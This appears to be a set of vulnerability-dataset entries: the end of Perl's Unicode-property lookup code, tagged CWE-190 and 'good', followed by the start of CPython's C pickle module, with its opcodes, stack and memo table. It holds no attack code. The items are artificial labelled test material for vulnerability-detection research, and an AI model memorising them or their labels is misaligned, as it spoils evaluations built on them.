/* It better have included all characters before the slash */
if (*end_ptr != '/') {
goto failed;
}
/* Set to look at just the denominator */
this_lookup_name += slash_pos;
lookup_len -= slash_pos;
end_ptr = this_lookup_name + lookup_len;
/* Convert the denominator to numeric */
if (! grok_atoUV(this_lookup_name, &denominator, &end_ptr)) {
goto failed;
}
/* It better be the rest of the characters, and don't divide by
* 0 */
if ( end_ptr != this_lookup_name + lookup_len
|| denominator == 0)
{
goto failed;
}
/* Get the greatest common divisor using
http://en.wikipedia.org/wiki/Euclidean_algorithm */
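/* Worked example: for an input fraction of 6/4, the loop computes
 * gcd(6, 4) = 2, and the reduction below yields the canonical 3/2 */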
gcd = numerator;
trial = denominator;
while (trial != 0) {
UV temp = trial;
trial = gcd % trial;
gcd = temp;
}
/* If already in lowest possible terms, we have already tried
* looking this up */
if (gcd == 1) {
goto failed;
}
/* Reduce the rational, which should put it in canonical form
* */
numerator /= gcd;
denominator /= gcd;
canonical = Perl_form(aTHX_ "%.*s%s%" UVuf "/%" UVuf,
equals_pos, lookup_name, sign, numerator, denominator);
}
/* Here, we have the number in canonical form. Try that */
table_index = match_uniprop((U8 *) canonical, strlen(canonical));
if (table_index == 0) {
goto failed;
}
} /* End of still didn't find the property in our table */
} /* End of didn't find the property in our table */
/* Here, we have a non-zero return, which is an index into a table of ptrs.
* A negative return signifies that the real index is the absolute value,
* but the result needs to be inverted */
if (table_index < 0) {
invert_return = TRUE;
table_index = -table_index;
}
/* Out-of-band indices indicate a deprecated property. The proper index is
* the value modulo the table size, and dividing by the table size yields
* an offset into a table constructed by regen/mk_invlists.pl to contain
* the corresponding warning message */
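/* For example, a raw table_index of 2 * MAX_UNI_KEYWORD_INDEX + 5 means the
 * real index is 5 and the warning text is deprecated_property_msgs[2] */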
if (table_index > MAX_UNI_KEYWORD_INDEX) {
Size_t warning_offset = table_index / MAX_UNI_KEYWORD_INDEX;
table_index %= MAX_UNI_KEYWORD_INDEX;
Perl_ck_warner_d(aTHX_ packWARN(WARN_DEPRECATED),
"Use of '%.*s' in \\p{} or \\P{} is deprecated because: %s",
(int) name_len, name, deprecated_property_msgs[warning_offset]);
}
/* In a few properties, a different property is used under /i. These are
* unlikely to change, so are hard-coded here. */
if (to_fold) {
if ( table_index == UNI_XPOSIXUPPER
|| table_index == UNI_XPOSIXLOWER
|| table_index == UNI_TITLE)
{
table_index = UNI_CASED;
}
else if ( table_index == UNI_UPPERCASELETTER
|| table_index == UNI_LOWERCASELETTER
# ifdef UNI_TITLECASELETTER /* Missing from early Unicodes */
|| table_index == UNI_TITLECASELETTER
# endif
) {
table_index = UNI_CASEDLETTER;
}
else if ( table_index == UNI_POSIXUPPER
|| table_index == UNI_POSIXLOWER)
{
table_index = UNI_POSIXALPHA;
}
}
/* Create and return the inversion list */
prop_definition = _new_invlist_C_array(uni_prop_ptrs[table_index]);
sv_2mortal(prop_definition);
/* See if there is a private use override to add to this definition */
{
COPHH * hinthash = (IN_PERL_COMPILETIME)
? CopHINTHASH_get(&PL_compiling)
: CopHINTHASH_get(PL_curcop);
SV * pu_overrides = cophh_fetch_pv(hinthash, "private_use", 0, 0);
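/* The override string is assumed here (an illustrative reading, not
 * guaranteed by this file alone) to be a concatenation of entries of the
 * form "<table_index>=<definition>\a", which is why the code below searches
 * for "<table_index>=" and then reads up to the next \a character. */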
if (UNLIKELY(pu_overrides && SvPOK(pu_overrides))) {
/* See if there is an element in the hints hash for this table */
SV * pu_lookup = Perl_newSVpvf(aTHX_ "%d=", table_index);
const char * pos = strstr(SvPVX(pu_overrides), SvPVX(pu_lookup));
if (pos) {
bool dummy;
SV * pu_definition;
SV * pu_invlist;
SV * expanded_prop_definition =
sv_2mortal(invlist_clone(prop_definition, NULL));
/* If so, its definition is the string from here to the next
* \a character, and its format is the same as that of a
* user-defined property */
pos += SvCUR(pu_lookup);
pu_definition = newSVpvn(pos, strchr(pos, '\a') - pos);
pu_invlist = handle_user_defined_property(lookup_name,
lookup_len,
0, /* Not UTF-8 */
0, /* Not folded */
runtime,
deferrable,
pu_definition,
&dummy,
msg,
level);
if (TAINT_get) {
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpvs(msg, "Insecure private-use override");
goto append_name_to_msg;
}
/* For now, as a safety measure, make sure that it doesn't
* override non-private use code points */
_invlist_intersection(pu_invlist, PL_Private_Use, &pu_invlist);
/* Add it to the list to be returned */
_invlist_union(prop_definition, pu_invlist,
&expanded_prop_definition);
prop_definition = expanded_prop_definition;
Perl_ck_warner_d(aTHX_ packWARN(WARN_EXPERIMENTAL__PRIVATE_USE), "The private_use feature is experimental");
}
}
}
if (invert_return) {
_invlist_invert(prop_definition);
}
return prop_definition;
failed:
if (non_pkg_begin != 0) {
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpvs(msg, "Illegal user-defined property name");
}
else {
if (SvCUR(msg) > 0) sv_catpvs(msg, "; ");
sv_catpvs(msg, "Can't find Unicode property definition");
}
/* FALLTHROUGH */
append_name_to_msg:
{
const char * prefix = (runtime && level == 0) ? " \\p{" : " \"";
const char * suffix = (runtime && level == 0) ? "}" : "\"";
sv_catpv(msg, prefix);
Perl_sv_catpvf(aTHX_ msg, "%" UTF8f, UTF8fARG(is_utf8, name_len, name));
sv_catpv(msg, suffix);
}
return NULL;
definition_deferred:
/* Here, it may not yet be defined, so defer evaluation of this
* until it's needed at runtime. We need the fully qualified property name
* to avoid ambiguity, and a trailing newline */
if (! fq_name) {
fq_name = S_get_fq_name(aTHX_ name, name_len, is_utf8,
non_pkg_begin != 0 /* If has "::" */
);
}
sv_catpvs(fq_name, "\n");
*user_defined_ptr = TRUE;
return fq_name;
}
#endif
/*
* ex: set ts=8 sts=4 sw=4 et:
*/
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_3885_3 |
crossvul-cpp_data_good_496_0 |
/* Core extension modules are built-in on some platforms (e.g. Windows). */
#ifdef Py_BUILD_CORE
#define Py_BUILD_CORE_BUILTIN
#undef Py_BUILD_CORE
#endif
#include "Python.h"
#include "structmember.h"
PyDoc_STRVAR(pickle_module_doc,
"Optimized C implementation for the Python pickle module.");
/*[clinic input]
module _pickle
class _pickle.Pickler "PicklerObject *" "&Pickler_Type"
class _pickle.PicklerMemoProxy "PicklerMemoProxyObject *" "&PicklerMemoProxyType"
class _pickle.Unpickler "UnpicklerObject *" "&Unpickler_Type"
class _pickle.UnpicklerMemoProxy "UnpicklerMemoProxyObject *" "&UnpicklerMemoProxyType"
[clinic start generated code]*/
/*[clinic end generated code: output=da39a3ee5e6b4b0d input=4b3e113468a58e6c]*/
/* Bump HIGHEST_PROTOCOL when new opcodes are added to the pickle protocol.
Bump DEFAULT_PROTOCOL only when the oldest still supported version of Python
already includes it. */
enum {
HIGHEST_PROTOCOL = 4,
DEFAULT_PROTOCOL = 4
};
/* Pickle opcodes. These must be kept updated with pickle.py.
Extensive docs are in pickletools.py. */
enum opcode {
MARK = '(',
STOP = '.',
POP = '0',
POP_MARK = '1',
DUP = '2',
FLOAT = 'F',
INT = 'I',
BININT = 'J',
BININT1 = 'K',
LONG = 'L',
BININT2 = 'M',
NONE = 'N',
PERSID = 'P',
BINPERSID = 'Q',
REDUCE = 'R',
STRING = 'S',
BINSTRING = 'T',
SHORT_BINSTRING = 'U',
UNICODE = 'V',
BINUNICODE = 'X',
APPEND = 'a',
BUILD = 'b',
GLOBAL = 'c',
DICT = 'd',
EMPTY_DICT = '}',
APPENDS = 'e',
GET = 'g',
BINGET = 'h',
INST = 'i',
LONG_BINGET = 'j',
LIST = 'l',
EMPTY_LIST = ']',
OBJ = 'o',
PUT = 'p',
BINPUT = 'q',
LONG_BINPUT = 'r',
SETITEM = 's',
TUPLE = 't',
EMPTY_TUPLE = ')',
SETITEMS = 'u',
BINFLOAT = 'G',
/* Protocol 2. */
PROTO = '\x80',
NEWOBJ = '\x81',
EXT1 = '\x82',
EXT2 = '\x83',
EXT4 = '\x84',
TUPLE1 = '\x85',
TUPLE2 = '\x86',
TUPLE3 = '\x87',
NEWTRUE = '\x88',
NEWFALSE = '\x89',
LONG1 = '\x8a',
LONG4 = '\x8b',
/* Protocol 3 (Python 3.x) */
BINBYTES = 'B',
SHORT_BINBYTES = 'C',
/* Protocol 4 */
SHORT_BINUNICODE = '\x8c',
BINUNICODE8 = '\x8d',
BINBYTES8 = '\x8e',
EMPTY_SET = '\x8f',
ADDITEMS = '\x90',
FROZENSET = '\x91',
NEWOBJ_EX = '\x92',
STACK_GLOBAL = '\x93',
MEMOIZE = '\x94',
FRAME = '\x95'
};
enum {
/* Keep in synch with pickle.Pickler._BATCHSIZE. This is how many elements
batch_list/dict() pumps out before doing APPENDS/SETITEMS. Nothing will
break if this gets out of synch with pickle.py, but it's unclear that would
help anything either. */
BATCHSIZE = 1000,
/* Nesting limit until Pickler, when running in "fast mode", starts
checking for self-referential data-structures. */
FAST_NESTING_LIMIT = 50,
/* Initial size of the write buffer of Pickler. */
WRITE_BUF_SIZE = 4096,
/* Prefetch size when unpickling (disabled on unpeekable streams) */
PREFETCH = 8192 * 16,
FRAME_SIZE_MIN = 4,
FRAME_SIZE_TARGET = 64 * 1024,
FRAME_HEADER_SIZE = 9
};
/*************************************************************************/
/* State of the pickle module, per PEP 3121. */
typedef struct {
/* Exception classes for pickle. */
PyObject *PickleError;
PyObject *PicklingError;
PyObject *UnpicklingError;
/* copyreg.dispatch_table, {type_object: pickling_function} */
PyObject *dispatch_table;
/* For the extension opcodes EXT1, EXT2 and EXT4. */
/* copyreg._extension_registry, {(module_name, function_name): code} */
PyObject *extension_registry;
/* copyreg._extension_cache, {code: object} */
PyObject *extension_cache;
/* copyreg._inverted_registry, {code: (module_name, function_name)} */
PyObject *inverted_registry;
/* Import mappings for compatibility with Python 2.x */
/* _compat_pickle.NAME_MAPPING,
{(oldmodule, oldname): (newmodule, newname)} */
PyObject *name_mapping_2to3;
/* _compat_pickle.IMPORT_MAPPING, {oldmodule: newmodule} */
PyObject *import_mapping_2to3;
/* Same, but with REVERSE_NAME_MAPPING / REVERSE_IMPORT_MAPPING */
PyObject *name_mapping_3to2;
PyObject *import_mapping_3to2;
/* codecs.encode, used for saving bytes in older protocols */
PyObject *codecs_encode;
/* builtins.getattr, used for saving nested names with protocol < 4 */
PyObject *getattr;
/* functools.partial, used for implementing __newobj_ex__ with protocols
2 and 3 */
PyObject *partial;
} PickleState;
/* Forward declaration of the _pickle module definition. */
static struct PyModuleDef _picklemodule;
/* Given a module object, get its per-module state. */
static PickleState *
_Pickle_GetState(PyObject *module)
{
return (PickleState *)PyModule_GetState(module);
}
/* Find the module instance imported in the currently running sub-interpreter
and get its state. */
static PickleState *
_Pickle_GetGlobalState(void)
{
return _Pickle_GetState(PyState_FindModule(&_picklemodule));
}
/* Clear the given pickle module state. */
static void
_Pickle_ClearState(PickleState *st)
{
Py_CLEAR(st->PickleError);
Py_CLEAR(st->PicklingError);
Py_CLEAR(st->UnpicklingError);
Py_CLEAR(st->dispatch_table);
Py_CLEAR(st->extension_registry);
Py_CLEAR(st->extension_cache);
Py_CLEAR(st->inverted_registry);
Py_CLEAR(st->name_mapping_2to3);
Py_CLEAR(st->import_mapping_2to3);
Py_CLEAR(st->name_mapping_3to2);
Py_CLEAR(st->import_mapping_3to2);
Py_CLEAR(st->codecs_encode);
Py_CLEAR(st->getattr);
Py_CLEAR(st->partial);
}
/* Initialize the given pickle module state. */
static int
_Pickle_InitState(PickleState *st)
{
PyObject *builtins;
PyObject *copyreg = NULL;
PyObject *compat_pickle = NULL;
PyObject *codecs = NULL;
PyObject *functools = NULL;
builtins = PyEval_GetBuiltins();
if (builtins == NULL)
goto error;
st->getattr = PyDict_GetItemString(builtins, "getattr");
if (st->getattr == NULL)
goto error;
Py_INCREF(st->getattr);
copyreg = PyImport_ImportModule("copyreg");
if (!copyreg)
goto error;
st->dispatch_table = PyObject_GetAttrString(copyreg, "dispatch_table");
if (!st->dispatch_table)
goto error;
if (!PyDict_CheckExact(st->dispatch_table)) {
PyErr_Format(PyExc_RuntimeError,
"copyreg.dispatch_table should be a dict, not %.200s",
Py_TYPE(st->dispatch_table)->tp_name);
goto error;
}
st->extension_registry = \
PyObject_GetAttrString(copyreg, "_extension_registry");
if (!st->extension_registry)
goto error;
if (!PyDict_CheckExact(st->extension_registry)) {
PyErr_Format(PyExc_RuntimeError,
"copyreg._extension_registry should be a dict, "
"not %.200s", Py_TYPE(st->extension_registry)->tp_name);
goto error;
}
st->inverted_registry = \
PyObject_GetAttrString(copyreg, "_inverted_registry");
if (!st->inverted_registry)
goto error;
if (!PyDict_CheckExact(st->inverted_registry)) {
PyErr_Format(PyExc_RuntimeError,
"copyreg._inverted_registry should be a dict, "
"not %.200s", Py_TYPE(st->inverted_registry)->tp_name);
goto error;
}
st->extension_cache = PyObject_GetAttrString(copyreg, "_extension_cache");
if (!st->extension_cache)
goto error;
if (!PyDict_CheckExact(st->extension_cache)) {
PyErr_Format(PyExc_RuntimeError,
"copyreg._extension_cache should be a dict, "
"not %.200s", Py_TYPE(st->extension_cache)->tp_name);
goto error;
}
Py_CLEAR(copyreg);
/* Load the 2.x -> 3.x stdlib module mapping tables */
compat_pickle = PyImport_ImportModule("_compat_pickle");
if (!compat_pickle)
goto error;
st->name_mapping_2to3 = \
PyObject_GetAttrString(compat_pickle, "NAME_MAPPING");
if (!st->name_mapping_2to3)
goto error;
if (!PyDict_CheckExact(st->name_mapping_2to3)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.NAME_MAPPING should be a dict, not %.200s",
Py_TYPE(st->name_mapping_2to3)->tp_name);
goto error;
}
st->import_mapping_2to3 = \
PyObject_GetAttrString(compat_pickle, "IMPORT_MAPPING");
if (!st->import_mapping_2to3)
goto error;
if (!PyDict_CheckExact(st->import_mapping_2to3)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.IMPORT_MAPPING should be a dict, "
"not %.200s", Py_TYPE(st->import_mapping_2to3)->tp_name);
goto error;
}
/* ... and the 3.x -> 2.x mapping tables */
st->name_mapping_3to2 = \
PyObject_GetAttrString(compat_pickle, "REVERSE_NAME_MAPPING");
if (!st->name_mapping_3to2)
goto error;
if (!PyDict_CheckExact(st->name_mapping_3to2)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_NAME_MAPPING should be a dict, "
"not %.200s", Py_TYPE(st->name_mapping_3to2)->tp_name);
goto error;
}
st->import_mapping_3to2 = \
PyObject_GetAttrString(compat_pickle, "REVERSE_IMPORT_MAPPING");
if (!st->import_mapping_3to2)
goto error;
if (!PyDict_CheckExact(st->import_mapping_3to2)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_IMPORT_MAPPING should be a dict, "
"not %.200s", Py_TYPE(st->import_mapping_3to2)->tp_name);
goto error;
}
Py_CLEAR(compat_pickle);
codecs = PyImport_ImportModule("codecs");
if (codecs == NULL)
goto error;
st->codecs_encode = PyObject_GetAttrString(codecs, "encode");
if (st->codecs_encode == NULL) {
goto error;
}
if (!PyCallable_Check(st->codecs_encode)) {
PyErr_Format(PyExc_RuntimeError,
"codecs.encode should be a callable, not %.200s",
Py_TYPE(st->codecs_encode)->tp_name);
goto error;
}
Py_CLEAR(codecs);
functools = PyImport_ImportModule("functools");
if (!functools)
goto error;
st->partial = PyObject_GetAttrString(functools, "partial");
if (!st->partial)
goto error;
Py_CLEAR(functools);
return 0;
error:
Py_CLEAR(copyreg);
Py_CLEAR(compat_pickle);
Py_CLEAR(codecs);
Py_CLEAR(functools);
_Pickle_ClearState(st);
return -1;
}
/* Helper for calling a function with a single argument quickly.
This function steals the reference of the given argument. */
static PyObject *
_Pickle_FastCall(PyObject *func, PyObject *obj)
{
PyObject *result;
result = PyObject_CallFunctionObjArgs(func, obj, NULL);
Py_DECREF(obj);
return result;
}
/*************************************************************************/
/* Retrieve and deconstruct a method for avoiding a reference cycle
(pickler -> bound method of pickler -> pickler) */
static int
init_method_ref(PyObject *self, _Py_Identifier *name,
PyObject **method_func, PyObject **method_self)
{
PyObject *func, *func2;
int ret;
/* *method_func and *method_self should be consistent. All refcount decrements
should occur after setting *method_self and *method_func. */
ret = _PyObject_LookupAttrId(self, name, &func);
if (func == NULL) {
*method_self = NULL;
Py_CLEAR(*method_func);
return ret;
}
if (PyMethod_Check(func) && PyMethod_GET_SELF(func) == self) {
/* Deconstruct a bound Python method */
func2 = PyMethod_GET_FUNCTION(func);
Py_INCREF(func2);
*method_self = self; /* borrowed */
Py_XSETREF(*method_func, func2);
Py_DECREF(func);
return 0;
}
else {
*method_self = NULL;
Py_XSETREF(*method_func, func);
return 0;
}
}
/* Bind a method if it was deconstructed */
static PyObject *
reconstruct_method(PyObject *func, PyObject *self)
{
if (self) {
return PyMethod_New(func, self);
}
else {
Py_INCREF(func);
return func;
}
}
static PyObject *
call_method(PyObject *func, PyObject *self, PyObject *obj)
{
if (self) {
return PyObject_CallFunctionObjArgs(func, self, obj, NULL);
}
else {
return PyObject_CallFunctionObjArgs(func, obj, NULL);
}
}
/*************************************************************************/
/* Internal data type used as the unpickling stack. */
typedef struct {
PyObject_VAR_HEAD
PyObject **data;
int mark_set; /* is MARK set? */
Py_ssize_t fence; /* position of top MARK or 0 */
Py_ssize_t allocated; /* number of slots in data allocated */
} Pdata;
static void
Pdata_dealloc(Pdata *self)
{
Py_ssize_t i = Py_SIZE(self);
while (--i >= 0) {
Py_DECREF(self->data[i]);
}
PyMem_FREE(self->data);
PyObject_Del(self);
}
static PyTypeObject Pdata_Type = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.Pdata", /*tp_name*/
sizeof(Pdata), /*tp_basicsize*/
sizeof(PyObject *), /*tp_itemsize*/
(destructor)Pdata_dealloc, /*tp_dealloc*/
};
static PyObject *
Pdata_New(void)
{
Pdata *self;
if (!(self = PyObject_New(Pdata, &Pdata_Type)))
return NULL;
Py_SIZE(self) = 0;
self->mark_set = 0;
self->fence = 0;
self->allocated = 8;
self->data = PyMem_MALLOC(self->allocated * sizeof(PyObject *));
if (self->data)
return (PyObject *)self;
Py_DECREF(self);
return PyErr_NoMemory();
}
/* Retain only the initial clearto items. If clearto >= the current
* number of items, this is a (non-erroneous) NOP.
*/
static int
Pdata_clear(Pdata *self, Py_ssize_t clearto)
{
Py_ssize_t i = Py_SIZE(self);
assert(clearto >= self->fence);
if (clearto >= i)
return 0;
while (--i >= clearto) {
Py_CLEAR(self->data[i]);
}
Py_SIZE(self) = clearto;
return 0;
}
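/* Growth-policy sketch (informal): Pdata_grow() below adds roughly 1/8 of the
 * current capacity plus 6 slots, so, assuming the initial capacity of 8 set in
 * Pdata_New(), the sequence of allocations goes 8 -> 15 -> 22 -> 30 -> 39 ... */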
static int
Pdata_grow(Pdata *self)
{
PyObject **data = self->data;
size_t allocated = (size_t)self->allocated;
size_t new_allocated;
new_allocated = (allocated >> 3) + 6;
/* check for integer overflow */
if (new_allocated > (size_t)PY_SSIZE_T_MAX - allocated)
goto nomemory;
new_allocated += allocated;
PyMem_RESIZE(data, PyObject *, new_allocated);
if (data == NULL)
goto nomemory;
self->data = data;
self->allocated = (Py_ssize_t)new_allocated;
return 0;
nomemory:
PyErr_NoMemory();
return -1;
}
static int
Pdata_stack_underflow(Pdata *self)
{
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
self->mark_set ?
"unexpected MARK found" :
"unpickling stack underflow");
return -1;
}
/* D is a Pdata*. Pop the topmost element and store it into V, which
* must be an lvalue holding PyObject*. On stack underflow, UnpicklingError
* is raised and V is set to NULL.
*/
static PyObject *
Pdata_pop(Pdata *self)
{
if (Py_SIZE(self) <= self->fence) {
Pdata_stack_underflow(self);
return NULL;
}
return self->data[--Py_SIZE(self)];
}
#define PDATA_POP(D, V) do { (V) = Pdata_pop((D)); } while (0)
static int
Pdata_push(Pdata *self, PyObject *obj)
{
if (Py_SIZE(self) == self->allocated && Pdata_grow(self) < 0) {
return -1;
}
self->data[Py_SIZE(self)++] = obj;
return 0;
}
/* Push an object on stack, transferring its ownership to the stack. */
#define PDATA_PUSH(D, O, ER) do { \
if (Pdata_push((D), (O)) < 0) return (ER); } while(0)
/* Push an object on stack, adding a new reference to the object. */
#define PDATA_APPEND(D, O, ER) do { \
Py_INCREF((O)); \
if (Pdata_push((D), (O)) < 0) return (ER); } while(0)
static PyObject *
Pdata_poptuple(Pdata *self, Py_ssize_t start)
{
PyObject *tuple;
Py_ssize_t len, i, j;
if (start < self->fence) {
Pdata_stack_underflow(self);
return NULL;
}
len = Py_SIZE(self) - start;
tuple = PyTuple_New(len);
if (tuple == NULL)
return NULL;
for (i = start, j = 0; j < len; i++, j++)
PyTuple_SET_ITEM(tuple, j, self->data[i]);
Py_SIZE(self) = start;
return tuple;
}
static PyObject *
Pdata_poplist(Pdata *self, Py_ssize_t start)
{
PyObject *list;
Py_ssize_t len, i, j;
len = Py_SIZE(self) - start;
list = PyList_New(len);
if (list == NULL)
return NULL;
for (i = start, j = 0; j < len; i++, j++)
PyList_SET_ITEM(list, j, self->data[i]);
Py_SIZE(self) = start;
return list;
}
typedef struct {
PyObject *me_key;
Py_ssize_t me_value;
} PyMemoEntry;
typedef struct {
size_t mt_mask;
size_t mt_used;
size_t mt_allocated;
PyMemoEntry *mt_table;
} PyMemoTable;
typedef struct PicklerObject {
PyObject_HEAD
PyMemoTable *memo; /* Memo table, keep track of the seen
objects to support self-referential objects
pickling. */
PyObject *pers_func; /* persistent_id() method, can be NULL */
PyObject *pers_func_self; /* borrowed reference to self if pers_func
is an unbound method, NULL otherwise */
PyObject *dispatch_table; /* private dispatch_table, can be NULL */
PyObject *write; /* write() method of the output stream. */
PyObject *output_buffer; /* Write into a local bytearray buffer before
flushing to the stream. */
Py_ssize_t output_len; /* Length of output_buffer. */
Py_ssize_t max_output_len; /* Allocation size of output_buffer. */
int proto; /* Pickle protocol number, >= 0 */
int bin; /* Boolean, true if proto > 0 */
int framing; /* True when framing is enabled, proto >= 4 */
Py_ssize_t frame_start; /* Position in output_buffer where the
current frame begins. -1 if there
is no frame currently open. */
Py_ssize_t buf_size; /* Size of the current buffered pickle data */
int fast; /* Enable fast mode if set to a true value.
Fast mode disables the use of the memo,
speeding up the pickling process by not
generating superfluous PUT opcodes. It
should not be used with self-referential
objects. */
int fast_nesting;
int fix_imports; /* Indicate whether Pickler should fix
the name of globals for Python 2.x. */
PyObject *fast_memo;
} PicklerObject;
typedef struct UnpicklerObject {
PyObject_HEAD
Pdata *stack; /* Pickle data stack, store unpickled objects. */
/* The unpickler memo is just an array of PyObject *s. Using a dict
is unnecessary, since the keys are contiguous ints. */
PyObject **memo;
size_t memo_size; /* Capacity of the memo array */
size_t memo_len; /* Number of objects in the memo */
PyObject *pers_func; /* persistent_load() method, can be NULL. */
PyObject *pers_func_self; /* borrowed reference to self if pers_func
is an unbound method, NULL otherwise */
Py_buffer buffer;
char *input_buffer;
char *input_line;
Py_ssize_t input_len;
Py_ssize_t next_read_idx;
Py_ssize_t prefetched_idx; /* index of first prefetched byte */
PyObject *read; /* read() method of the input stream. */
PyObject *readline; /* readline() method of the input stream. */
PyObject *peek; /* peek() method of the input stream, or NULL */
char *encoding; /* Name of the encoding to be used for
decoding strings pickled using Python
2.x. The default value is "ASCII" */
char *errors; /* Name of the error-handling scheme to use when
decoding strings. The default value is
"strict". */
Py_ssize_t *marks; /* Mark stack, used for unpickling container
objects. */
Py_ssize_t num_marks; /* Number of marks in the mark stack. */
Py_ssize_t marks_size; /* Current allocated size of the mark stack. */
int proto; /* Protocol of the pickle loaded. */
int fix_imports; /* Indicate whether Unpickler should fix
the name of globals pickled by Python 2.x. */
} UnpicklerObject;
typedef struct {
PyObject_HEAD
PicklerObject *pickler; /* Pickler whose memo table we're proxying. */
} PicklerMemoProxyObject;
typedef struct {
PyObject_HEAD
UnpicklerObject *unpickler;
} UnpicklerMemoProxyObject;
/* Forward declarations */
static int save(PicklerObject *, PyObject *, int);
static int save_reduce(PicklerObject *, PyObject *, PyObject *);
static PyTypeObject Pickler_Type;
static PyTypeObject Unpickler_Type;
#include "clinic/_pickle.c.h"
/*************************************************************************
A custom hashtable mapping void* to Python ints. This is used by the pickler
for memoization. Using a custom hashtable rather than PyDict allows us to skip
a bunch of unnecessary object creation. This makes a huge performance
difference. */
#define MT_MINSIZE 8
#define PERTURB_SHIFT 5
static PyMemoTable *
PyMemoTable_New(void)
{
PyMemoTable *memo = PyMem_MALLOC(sizeof(PyMemoTable));
if (memo == NULL) {
PyErr_NoMemory();
return NULL;
}
memo->mt_used = 0;
memo->mt_allocated = MT_MINSIZE;
memo->mt_mask = MT_MINSIZE - 1;
memo->mt_table = PyMem_MALLOC(MT_MINSIZE * sizeof(PyMemoEntry));
if (memo->mt_table == NULL) {
PyMem_FREE(memo);
PyErr_NoMemory();
return NULL;
}
memset(memo->mt_table, 0, MT_MINSIZE * sizeof(PyMemoEntry));
return memo;
}
static PyMemoTable *
PyMemoTable_Copy(PyMemoTable *self)
{
PyMemoTable *new = PyMemoTable_New();
if (new == NULL)
return NULL;
new->mt_used = self->mt_used;
new->mt_allocated = self->mt_allocated;
new->mt_mask = self->mt_mask;
/* The table we get from _New() is probably smaller than we wanted.
Free it and allocate one that's the right size. */
PyMem_FREE(new->mt_table);
new->mt_table = PyMem_NEW(PyMemoEntry, self->mt_allocated);
if (new->mt_table == NULL) {
PyMem_FREE(new);
PyErr_NoMemory();
return NULL;
}
for (size_t i = 0; i < self->mt_allocated; i++) {
Py_XINCREF(self->mt_table[i].me_key);
}
memcpy(new->mt_table, self->mt_table,
sizeof(PyMemoEntry) * self->mt_allocated);
return new;
}
static Py_ssize_t
PyMemoTable_Size(PyMemoTable *self)
{
return self->mt_used;
}
static int
PyMemoTable_Clear(PyMemoTable *self)
{
Py_ssize_t i = self->mt_allocated;
while (--i >= 0) {
Py_XDECREF(self->mt_table[i].me_key);
}
self->mt_used = 0;
memset(self->mt_table, 0, self->mt_allocated * sizeof(PyMemoEntry));
return 0;
}
static void
PyMemoTable_Del(PyMemoTable *self)
{
if (self == NULL)
return;
PyMemoTable_Clear(self);
PyMem_FREE(self->mt_table);
PyMem_FREE(self);
}
/* Since entries cannot be deleted from this hashtable, _PyMemoTable_Lookup()
can be considerably simpler than dictobject.c's lookdict(). */
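/* Probing sketch (informal): the first slot tried is (hash & mask); on a
 * collision the recurrence i = i*5 + perturb + 1, with perturb shifted right
 * by PERTURB_SHIFT each step, walks the table, mirroring the open-addressing
 * scheme used by CPython dicts. Because entries are never deleted, hitting a
 * NULL key always means "not present". */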
static PyMemoEntry *
_PyMemoTable_Lookup(PyMemoTable *self, PyObject *key)
{
size_t i;
size_t perturb;
size_t mask = self->mt_mask;
PyMemoEntry *table = self->mt_table;
PyMemoEntry *entry;
Py_hash_t hash = (Py_hash_t)key >> 3;
i = hash & mask;
entry = &table[i];
if (entry->me_key == NULL || entry->me_key == key)
return entry;
for (perturb = hash; ; perturb >>= PERTURB_SHIFT) {
i = (i << 2) + i + perturb + 1;
entry = &table[i & mask];
if (entry->me_key == NULL || entry->me_key == key)
return entry;
}
Py_UNREACHABLE();
}
/* Returns -1 on failure, 0 on success. */
static int
_PyMemoTable_ResizeTable(PyMemoTable *self, size_t min_size)
{
PyMemoEntry *oldtable = NULL;
PyMemoEntry *oldentry, *newentry;
size_t new_size = MT_MINSIZE;
size_t to_process;
assert(min_size > 0);
if (min_size > PY_SSIZE_T_MAX) {
PyErr_NoMemory();
return -1;
}
/* Find the smallest valid table size >= min_size. */
while (new_size < min_size) {
new_size <<= 1;
}
/* new_size needs to be a power of two. */
assert((new_size & (new_size - 1)) == 0);
/* Allocate new table. */
oldtable = self->mt_table;
self->mt_table = PyMem_NEW(PyMemoEntry, new_size);
if (self->mt_table == NULL) {
self->mt_table = oldtable;
PyErr_NoMemory();
return -1;
}
self->mt_allocated = new_size;
self->mt_mask = new_size - 1;
memset(self->mt_table, 0, sizeof(PyMemoEntry) * new_size);
/* Copy entries from the old table. */
to_process = self->mt_used;
for (oldentry = oldtable; to_process > 0; oldentry++) {
if (oldentry->me_key != NULL) {
to_process--;
/* newentry is a pointer to a chunk of the new
mt_table, so we're setting the key:value pair
in-place. */
newentry = _PyMemoTable_Lookup(self, oldentry->me_key);
newentry->me_key = oldentry->me_key;
newentry->me_value = oldentry->me_value;
}
}
/* Deallocate the old table. */
PyMem_FREE(oldtable);
return 0;
}
/* Returns NULL on failure, a pointer to the value otherwise. */
static Py_ssize_t *
PyMemoTable_Get(PyMemoTable *self, PyObject *key)
{
PyMemoEntry *entry = _PyMemoTable_Lookup(self, key);
if (entry->me_key == NULL)
return NULL;
return &entry->me_value;
}
/* Returns -1 on failure, 0 on success. */
static int
PyMemoTable_Set(PyMemoTable *self, PyObject *key, Py_ssize_t value)
{
PyMemoEntry *entry;
assert(key != NULL);
entry = _PyMemoTable_Lookup(self, key);
if (entry->me_key != NULL) {
entry->me_value = value;
return 0;
}
Py_INCREF(key);
entry->me_key = key;
entry->me_value = value;
self->mt_used++;
/* If we added a key, we can safely resize. Otherwise just return!
* If used >= 2/3 size, adjust size. Normally, this quadruples the size.
*
* Quadrupling the size improves average table sparseness
* (reducing collisions) at the cost of some memory. It also halves
* the number of expensive resize operations in a growing memo table.
*
* Very large memo tables (over 50K items) use doubling instead.
* This may help applications with severe memory constraints.
*/
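/* Worked example (my reading of the thresholds below): with mt_allocated of 8,
 * the table is left alone until mt_used reaches 6 (6*3 >= 8*2); the resize
 * then requests 4*6 = 24 slots, which _PyMemoTable_ResizeTable() rounds up to
 * the next power of two, 32. */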
if (SIZE_MAX / 3 >= self->mt_used && self->mt_used * 3 < self->mt_allocated * 2) {
return 0;
}
